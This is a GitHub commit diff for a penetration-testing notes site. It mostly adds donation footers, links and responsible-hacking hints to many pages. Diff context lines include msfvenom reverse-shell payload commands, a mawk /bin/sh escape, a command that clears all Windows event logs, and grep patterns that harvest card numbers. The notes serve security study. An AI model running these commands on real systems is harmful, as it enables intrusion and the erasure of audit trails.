Skip to content

Commit bc4a934

Browse files
zweilosecgitbook-bot
authored andcommitted
GitBook: [master] 38 pages modified
1 parent fcf725c commit bc4a934

38 files changed

+149
-17
lines changed

README.md

+11-2
Original file line numberDiff line numberDiff line change
@@ -36,10 +36,12 @@ Always ensure you have **explicit** permission to access any computer system **b
3636

3737
* [Linux Basics](linux-1/linux-basics.md)
3838
* [Hardening & Configuration Guide ](linux-1/linux-hardening/)
39+
* [TMUX/Screen Cheatsheet](linux-1/linux-hardening/tmux-screen-cheatsheet.md)
3940
* [Red Team Notes](linux-1/linux-redteam/)
4041
* [Enumeration](linux-1/linux-redteam/enumeration.md)
4142
* [Getting Access](linux-1/linux-redteam/getting-access.md)
4243
* [Privilege Escalation](linux-1/linux-redteam/privilege-escalation.md)
44+
* [Exfiltration](linux-1/linux-redteam/exfiltration.md)
4345
* [Persistence](linux-1/linux-redteam/persistance.md)
4446
* [Vim](linux-1/vim.md)
4547

@@ -68,7 +70,9 @@ Always ensure you have **explicit** permission to access any computer system **b
6870
## Web
6971

7072
* [DNS](web/dns.md)
73+
* [Subdomain/Virtual Host Enumeration](web/subdomain-virtual-host-enumeration.md)
7174
* [Web Apps](web/web-notes/)
75+
* [Web Application Hacker's Handbook Task Checklist](web/web-notes/the-web-application-hackers-handbook.md)
7276

7377
## Mobile
7478

@@ -82,8 +86,13 @@ Always ensure you have **explicit** permission to access any computer system **b
8286
* [OS Agnostic](os-agnostic/os_agnostic.md)
8387
* [OSINT](os-agnostic/osint.md)
8488
* [Password Cracking](os-agnostic/password-cracking/)
89+
* [Gathering the Hashes](os-agnostic/password-cracking/gathering-the-hashes.md)
90+
* [Wordlist Generation](os-agnostic/password-cracking/wordlist-manipulation.md)
91+
* [Cracking the Hashes](os-agnostic/password-cracking/cracking-the-hashes.md)
8592
* [Reverse Engineering & Binary Exploitation](os-agnostic/reverse-engineering-and-binary-exploitation/)
93+
* [Buffer Overflow](os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md)
8694
* [Scripting](os-agnostic/scripting/)
95+
* [Scripting Language Syntax Comparison](os-agnostic/scripting/script-language-comparison.md)
8796
* [SQL](os-agnostic/sql.md)
8897
* [SSH & SCP](os-agnostic/ssh-and-scp.md)
8998
* [Steganography](os-agnostic/steganography.md)
@@ -93,11 +102,11 @@ Always ensure you have **explicit** permission to access any computer system **b
93102

94103
* [Unsorted Notes](untitled.md)
95104

96-
## CTF Tools and Cheatsheets
105+
## OSCP/CTF Tools and Cheatsheets
97106

98107
[List of outside sources](tools-cheatsheets.md)
99108

100109

101110

102-
If you like this content and would like to see more, please consider supporting me through Patreon at [https://www.patreon.com/zweilosec](https://www.patreon.com/zweilosec).
111+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
103112

hacking-methodology.md

+2
Original file line numberDiff line numberDiff line change
@@ -44,3 +44,5 @@ Proper and thorough enumeration is the key to a successful engagement. Privilege
4444
* Adapting - Customize the exploit so it fits. Not every exploit works for every system "out of the box".
4545
* Trying - Get ready for \(lots of\) trial and error.
4646

47+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
48+

hands-on-practice.md

+2
Original file line numberDiff line numberDiff line change
@@ -73,3 +73,5 @@ Other compilations:
7373

7474
* [https://razvioverflow.github.io/starthacking](https://razvioverflow.github.io/starthacking) Razvioverflow
7575

76+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
77+

linux-1/linux-basics.md

+2
Original file line numberDiff line numberDiff line change
@@ -480,3 +480,5 @@ sudo chmod ugo+r /var/lib/command-not-found/commands.db* #fix database permissio
480480
* [https://explainshell.com/](https://explainshell.com/)
481481
* [https://unix.stackexchange.com/questions/26047/how-to-correctly-add-a-path-to-path](https://unix.stackexchange.com/questions/26047/how-to-correctly-add-a-path-to-path)
482482

483+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
484+

linux-1/linux-hardening/README.md

+2
Original file line numberDiff line numberDiff line change
@@ -377,3 +377,5 @@ echo '1' > /proc/sys/net/ipv4/ip_forward
377377
* [https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/](https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/)
378378
* [https://www.thegeekdiary.com/what-is-the-purpose-of-utmp-wtmp-and-btmp-files-in-linux/](https://www.thegeekdiary.com/what-is-the-purpose-of-utmp-wtmp-and-btmp-files-in-linux/)
379379

380+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
381+

linux-1/linux-hardening/tmux-screen-cheatsheet.md

+2
Original file line numberDiff line numberDiff line change
@@ -324,3 +324,5 @@ Kill pane: `prefix + &`
324324
* tmux logging plugin \(get this!!\) can save log of tmux windows
325325
* [better mouse mode](https://github.com/NHDaly/tmux-better-mouse-mode)
326326

327+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
328+

linux-1/linux-redteam/README.md

+4
Original file line numberDiff line numberDiff line change
@@ -64,3 +64,7 @@ pretty print JSON text in console \([https://www.howtogeek.com/529219/how-to-par
6464

6565
`vi -c 'let $enc = &fileencoding | execute "!echo Encoding: $enc" | q' <file_to_check>` check encoding of a text file \(needed especially when doing crypto with python, or cracking passwords with `rockyou.txt` - _hint: needs latin encoding!_\) [https://vim.fandom.com/wiki/Bash\_file\_encoding\_alias](https://vim.fandom.com/wiki/Bash_file_encoding_alias) \(how to make an alias for the above command\)
6666

67+
68+
69+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
70+

linux-1/linux-redteam/enumeration.md

+2
Original file line numberDiff line numberDiff line change
@@ -621,3 +621,5 @@ find / -name ftp
621621
* [https://securityreason.com](https://securityreason.com)
622622
* [https://seclists.org/fulldisclosure/](https://seclists.org/fulldisclosure/)
623623

624+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
625+

linux-1/linux-redteam/exfiltration.md

+2
Original file line numberDiff line numberDiff line change
@@ -133,3 +133,5 @@ if __name__ == '__main__':
133133
main()
134134
```
135135
136+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
137+

linux-1/linux-redteam/getting-access.md

+2
Original file line numberDiff line numberDiff line change
@@ -329,3 +329,5 @@ xhost +targetip
329329
* [https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html](https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html)
330330
* [https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
331331

332+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
333+

linux-1/linux-redteam/persistance.md

+2
Original file line numberDiff line numberDiff line change
@@ -24,3 +24,5 @@ Add script to run at startup: `update-rc.d </path/to/the/script> defaults` \(nee
2424
* `$comment` is usually the user's Full Name. Check the `/etc/passwd` file to ensure you match local standards.
2525
* \(assumes you have write privilege to this file!\).
2626

27+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
28+

linux-1/linux-redteam/privilege-escalation.md

+2
Original file line numberDiff line numberDiff line change
@@ -359,3 +359,5 @@ mawk 'BEGIN {system("/bin/sh")}'
359359
* [https://touhidshaikh.com/blog/2018/04/sudo-ld\_preload-linux-privilege-escalation/](https://touhidshaikh.com/blog/2018/04/sudo-ld_preload-linux-privilege-escalation/)
360360
* [https://www.baeldung.com/linux/ld\_preload-trick-what-is](https://www.baeldung.com/linux/ld_preload-trick-what-is)
361361

362+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
363+

linux-1/vim.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -29,5 +29,5 @@ Enter insert \(normal text edit\) mode: `i` _\(yep that's it, just type and move
2929
* [https://www.youtube.com/watch?v=OnUiHLYZgaA](https://www.youtube.com/watch?v=OnUiHLYZgaA)
3030
* vim plugins: fuzzy finder plugin ctrlp /// surround.vim
3131

32-
\_\_
32+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
3333

os-agnostic/cryptography-and-encryption.md

+4
Original file line numberDiff line numberDiff line change
@@ -125,3 +125,7 @@ public class Program
125125

126126
Decodes to: `w3lc0meFr31nd`
127127

128+
129+
130+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
131+

os-agnostic/network-hardware.md

+7-3
Original file line numberDiff line numberDiff line change
@@ -6,15 +6,19 @@ Hack Responsibly.
66
Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
77
{% endhint %}
88

9+
Not much here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
10+
911
[https://www.bettercap.org/](https://www.bettercap.org/)
1012

1113
[https://miloserdov.org/?p=1112\#1](https://miloserdov.org/?p=1112#1)
1214

13-
Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
14-
1515
## Default credentials/configurations
1616

1717
[https://www.routerdefaults.org/](https://www.routerdefaults.org/)
1818

19-
[https://www.routerpasswords.com/](https://www.routerpasswords.com/)
19+
{% embed url="https://www.routerpasswords.com/" %}
20+
21+
22+
23+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
2024

os-agnostic/osint.md

+4
Original file line numberDiff line numberDiff line change
@@ -187,3 +187,7 @@ Not all of these sites below are trustworthy. Do not enter any credentials that
187187
* https://intelx.io
188188
* https://leakprobe.net
189189

190+
191+
192+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
193+

os-agnostic/password-cracking/README.md

+4
Original file line numberDiff line numberDiff line change
@@ -77,3 +77,7 @@ Example: `1:2:a1%.` The generated passwords will be of length 1 to 2 and contain
7777
* [https://guide.offsecnewbie.com/password-cracking](https://guide.offsecnewbie.com/password-cracking)
7878
* [https://www.hackingarticles.in/abusing-kerberos-using-impacket/](https://www.hackingarticles.in/abusing-kerberos-using-impacket/)
7979

80+
81+
82+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
83+

os-agnostic/password-cracking/cracking-the-hashes.md

+4
Original file line numberDiff line numberDiff line change
@@ -343,3 +343,7 @@ public class Program
343343

344344
Decodes to: `w3lc0meFr31nd`
345345

346+
347+
348+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
349+

os-agnostic/password-cracking/gathering-the-hashes.md

+4
Original file line numberDiff line numberDiff line change
@@ -160,3 +160,7 @@ AMEX `# grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt`
160160

161161
`# egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt`
162162

163+
164+
165+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
166+

os-agnostic/password-cracking/wordlist-manipulation.md

+5-1
Original file line numberDiff line numberDiff line change
@@ -113,7 +113,7 @@ tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n2
113113

114114
`# unix2dos file.txt`
115115

116-
### Remove from one file what is in another file
116+
### Extract the difference between two files
117117

118118
`# grep -F -v -f file1.txt -w file2.txt > file3.txt`
119119

@@ -129,3 +129,7 @@ tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n2
129129

130130
`# awk '{ print NR, $0 }' file.txt | grep "string-to-grep"`
131131

132+
133+
134+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
135+

os-agnostic/reverse-engineering-and-binary-exploitation/README.md

+5-1
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@ Hack Responsibly.
66
Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
77
{% endhint %}
88

9-
## Binary Exploitation / Reverse Engineering
9+
Not much here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
1010

1111
[Ghidra](https://ghidra-sre.org/)!
1212

@@ -33,3 +33,7 @@ simple binary exploitation [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/
3333

3434
Find the location of a specific string to manipulate and its bit offset in an executable:`strings -t d <file> | grep <string to locate in ELF>`
3535

36+
37+
38+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
39+
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,13 @@
11
# Buffer Overflow
22

3+
Not much here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
4+
5+
6+
37
Buffer Overflow-specific resources:
48

59
* [https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/](https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/)
610
* [https://github.com/justinsteven/dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
711

12+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
13+

os-agnostic/scripting/README.md

+2
Original file line numberDiff line numberDiff line change
@@ -270,3 +270,5 @@ _With Finfo\(\)_
270270
new Finfo(0,glob(hex2bin(hex2bin(3261)))[0]);
271271
```
272272
273+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
274+

os-agnostic/scripting/script-language-comparison.md

+2
Original file line numberDiff line numberDiff line change
@@ -1971,3 +1971,5 @@ References
19711971
* [https://wiki.bash-hackers.org/syntax/expansion/cmdsubst](https://wiki.bash-hackers.org/syntax/expansion/cmdsubst)
19721972
* [https://www.tutorialspoint.com/batch\_script/batch\_script\_syntax.htm](https://www.tutorialspoint.com/batch_script/batch_script_syntax.htm)
19731973
*
1974+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
1975+

tools-cheatsheets.md

+4
Original file line numberDiff line numberDiff line change
@@ -51,3 +51,7 @@ Always ensure you have **explicit** permission to access any computer system **b
5151

5252
[https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
5353

54+
55+
56+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
57+

web/dns.md

+4
Original file line numberDiff line numberDiff line change
@@ -295,3 +295,7 @@ dnsrecon -d zonetransfer.me -t axfr
295295
dnsenum zonetransfer.me
296296
```
297297

298+
299+
300+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
301+

web/subdomain-virtual-host-enumeration.md

+10
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,11 @@
11
# Subdomain/Virtual Host Enumeration
22

3+
{% hint style="success" %}
4+
Hack Responsibly.
5+
6+
Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
7+
{% endhint %}
8+
39
## Wordlists
410

511
* [https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS)
@@ -227,3 +233,7 @@ nmap $ip -oX scan
227233
cat scan.xml | aquatone -nmap
228234
```
229235
236+
237+
238+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
239+

web/web-notes/README.md

+11-5
Original file line numberDiff line numberDiff line change
@@ -263,15 +263,21 @@ nikto -useproxy http://$ip:3128 -h $ip
263263

264264
## OpenVAS Vulnerability Scanner
265265

266-
```text
267-
apt-get update
268-
269-
apt-get install openvas
266+
```bash
267+
#Install openvas
268+
apt update
269+
apt install openvas
270270

271+
#Run the setup script
271272
openvas-setup
272273

274+
#Check that it is running on port 939
273275
netstat -tulpn
274276

275-
Login at: https://$ip:939
277+
#Login by using a browser to navigate to: https://127.0.0.1:939
276278
```
277279

280+
281+
282+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
283+

web/web-notes/the-web-application-hackers-handbook.md

+4
Original file line numberDiff line numberDiff line change
@@ -104,3 +104,7 @@ Based off of the original _Web Application Hacker's Handbook_, this project was
104104
* [https://portswigger.net/web-security](https://portswigger.net/web-security)
105105
* [https://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab](https://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab)
106106

107+
108+
109+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
110+

windows-1/powershell.md

+4
Original file line numberDiff line numberDiff line change
@@ -704,3 +704,7 @@ PowerShell reverse shell and exploit scripts: `nishang` To learn how to use this
704704
* [https://0xdarkvortex.dev/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/](https://0xdarkvortex.dev/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/) - site down?
705705
* [https://activedirectorypro.com/powershell-commands/](https://activedirectorypro.com/powershell-commands/)
706706

707+
708+
709+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
710+

windows-1/windows-basics.md

+2
Original file line numberDiff line numberDiff line change
@@ -306,3 +306,5 @@ To remove a previously mounted share: `"net use z: /delete"`
306306

307307
PowerShell is a large and important enough topic that it has its [own page](powershell.md).
308308

309+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
310+

windows-1/windows-hardening.md

+6-3
Original file line numberDiff line numberDiff line change
@@ -21,9 +21,12 @@ disable location, telemetry, etc
2121

2222
{% embed url="https://ninite.com" %}
2323

24-
notepad++
24+
* [notepad++](https://notepad-plus-plus.org/)
25+
* [Visual Studio Code](https://code.visualstudio.com/)
26+
* [Tor Browser](https://www.torproject.org/)
27+
* Based on Firefox. Be careful of settings and extensions used as these can break the protection provided by the VPN.
2528

26-
Visual Studio Code
2729

28-
Tor Browser - based on Firefox. Be careful of settings and extensions used as these can break the protection provided by the VPN.
30+
31+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
2932

windows-1/windows-redteam/README.md

+4
Original file line numberDiff line numberDiff line change
@@ -54,3 +54,7 @@ check what updates are installed: `type WindowsUpdate.log`
5454

5555
net use share from linux \[like SimpleHTTPServer for Samba\]: `impacket-smbserver <sharename> '<dir_to_share>'`
5656

57+
58+
59+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
60+

windows-1/windows-redteam/active-directory.md

+2
Original file line numberDiff line numberDiff line change
@@ -1363,3 +1363,5 @@ Backup-Gpo -All -Path E:GPObackup
13631363

13641364

13651365

1366+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
1367+

windows-1/windows-redteam/enumeration.md

+4
Original file line numberDiff line numberDiff line change
@@ -1506,3 +1506,7 @@ done
15061506
* [https://sysnetdevops.com/2017/04/24/exploring-the-powershell-alternative-to-netstat/](https://sysnetdevops.com/2017/04/24/exploring-the-powershell-alternative-to-netstat/)
15071507
* [https://techexpert.tips/powershell/powershell-list-open-udp-ports/](https://techexpert.tips/powershell/powershell-list-open-udp-ports/)
15081508
1509+
1510+
1511+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
1512+

windows-1/windows-redteam/getting-access.md

+5-1
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,8 @@ Hack Responsibly.
66
Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
77
{% endhint %}
88

9+
Not much here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
10+
911
## **Reverse Shells**
1012

1113
TODO: description and methodology for each section \(as needed\); Fix code examples so they can be used for scripting
@@ -50,5 +52,7 @@ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > reve
5052
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > reversetcp.exe
5153
```
5254

53-
Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
55+
56+
57+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
5458

windows-1/windows-redteam/persistence.md

+4
Original file line numberDiff line numberDiff line change
@@ -579,3 +579,7 @@ for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
579579
* [https://www.tenforums.com/tutorials/16588-clear-all-event-logs-event-viewer-windows.html](https://www.tenforums.com/tutorials/16588-clear-all-event-logs-event-viewer-windows.html) - [Shawn Brink](https://www.tenforums.com/members/brink.html?s=c4719816f0e7a9450a073c5aeafb6024)
580580
* [https://techibee.com/powershell/use-wmi-powershell-to-enable-or-disable-rdp-on-windows-server/3071](https://techibee.com/powershell/use-wmi-powershell-to-enable-or-disable-rdp-on-windows-server/3071)
581581

582+
583+
584+
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
585+

0 commit comments

Comments
 (0)